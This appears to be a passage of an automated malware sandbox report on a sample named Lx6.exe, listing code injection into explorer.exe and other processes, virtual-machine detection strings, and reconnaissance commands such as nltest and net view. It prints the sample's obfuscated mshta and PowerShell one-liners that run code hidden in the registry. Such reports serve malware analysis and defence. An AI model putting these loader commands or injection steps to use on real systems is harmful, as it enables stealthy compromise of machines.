Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vupj0yhs.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msihj3zd.dll	Jump to dropped file

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Lx6.exe

0_2_00768664

Source: explorer.exe, 0000000E.00000000.482443266.000000000834F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 0000000E.00000000.482233541.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000E.00000000.536033895.00000000059F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 0000000E.00000000.482633151.0000000008394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Storage Accelerator
Source: RuntimeBroker.exe, 0000001F.00000000.642513702.0000014899851000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_SystemDriverstorfltWin32_SystemDriverWin32_ComputerSystem374653StoppedOKstorfltstorfltstorfltKernel DriverManualNormalC:\Windows\system32\drivers\vmstorfl.sysMicrosoft Hyper-V Storage AcceleratorMicrosoft Hyper-V Storage AcceleratorMicrosoft Hyper-V Storage Accelerator
Source: 9AF9.bin1.20.dr	Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: 9AF9.bin1.20.dr	Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000000E.00000000.521152311.000000000CDEC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: 9AF9.bin1.20.dr	Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: 9AF9.bin1.20.dr	Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000000E.00000000.482233541.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Guest Infrastructure Driver
Source: driverquery.exe, 0000003B.00000003.751303070.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp, driverquery.exe, 0000003B.00000002.754257472.0000022034DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_SystemDrivervmgidWin32_SystemDriverWin32_ComputerSystem374653StoppedOKvmgidvmgidvmgidKernel DriverManualNormalC:\Windows\system32\drivers\vmgid.sysMicrosoft Hyper-V Guest Infrastructure DriverMicrosoft Hyper-V Guest Infrastructure DriverMicrosoft Hyper-V Guest Infrastructure Driver
Source: explorer.exe, 0000000E.00000000.484259706.00000000085A9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9AF9.bin1.20.dr	Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: 9AF9.bin1.20.dr	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: RuntimeBroker.exe, 0000001B.00000000.604758910.000001D021800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:H

Source: C:\Users\user\Desktop\Lx6.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00752299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_00752299
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00761577 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_00761577
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075154D FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	0_2_0075154D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03022299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	35_2_03022299
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302154D FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	35_2_0302154D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03031577 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	35_2_03031577

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

0_2_00401000

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075D977 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		0_2_0075D977
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302D977 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		35_2_0302D977

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: apnfy.msn.com
Source: C:\Windows\explorer.exe	Domain query: www.msn.com

Maps a DLL or memory area into another process

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: unknown target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: unknown target: C:\Windows\System32\cmd.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2240CB00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D023B80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 148997F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1CEDB0F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1FA9D410000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1AF8B460000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9ABD1580	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Lx6.exe	Memory written: C:\Windows\System32\control.exe base: 7FF712EA12E0	Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe	Memory written: C:\Windows\System32\control.exe base: 7FF712EA12E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 6C6000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FF89ABD1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 27C0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FF89ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9BF5850000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2240CB00000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9FF00FB000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D023B80000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: E1A059000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 148997F0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: DA6FC0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D00000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: DA6FC0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 7FF632277380	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CEDB0F0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\cmd.exe base: 7FF632277380	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF635983220
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 191D1E60000
Source: C:\Windows\System32\cmd.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF635983220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 19932670000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 24EF3D30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe base: 7FF70751E240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1FA9D410000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 1AF8B460000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe base: 7FF77B174A10

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF89ABD1580 protect: page execute read	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3528 base: 6C6000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3528 base: 7FF89ABD1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3528 base: 27C0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3528 base: 7FF89ABD1580 value: 40	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3528	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3124	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 4372	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 4552	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 5832	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 1920	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Thread register set: target process: 6064
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 5836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3536
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Thread register set: target process: 1716
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Thread register set: target process: 5240

Source: unknown	Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>ccqf='wscript.shell';resizeto(0,2);eval(new activexobject(ccqf).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([system.text.encoding]::ascii.getstring((wslluui "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([system.text.encoding]::ascii.getstring((wslluui "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))	Jump to behavior

Source: C:\Users\user\Desktop\Lx6.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\more.com more
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"

Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Managerzx
Source: explorer.exe, 0000000E.00000000.542446129.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.518351829.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.501749346.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.530080768.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.459146583.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanath
Source: explorer.exe, 0000000E.00000000.462507554.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.508193796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.530473355.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Lx6.exe

Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_00401673

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
